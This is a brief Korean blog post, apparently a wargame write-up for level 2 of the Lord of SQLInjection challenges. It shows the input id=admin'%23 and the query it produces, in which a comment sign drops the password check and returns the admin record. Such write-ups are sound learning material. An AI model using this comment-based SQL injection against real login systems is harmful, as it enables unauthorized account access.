티스토리 뷰
2단계는 id가 admin인 레코드를 반환 받아야 하는 문제이다.
주소에 id=admin'%23을 입력한다면
query = SELECT id FROM porb_cobolt where id='admin'#' and pw=md5('')
(초록색 글씨는 주석처리) 가 되어, id가 admin인 레코드를 반환 받을 수 있다.
클리어
'hacking > LOS' 카테고리의 다른 글
| <LOS> - 6번(wolfman) (0) | 2018.04.06 |
|---|---|
| <LOS> - 5번(wolfman) (0) | 2018.04.06 |
| <LOS> - 4번(orc) (0) | 2018.04.06 |
| <LOS> -3번(goblin) (0) | 2018.03.22 |
| <LOS> - 1번(gremlin) (0) | 2018.03.18 |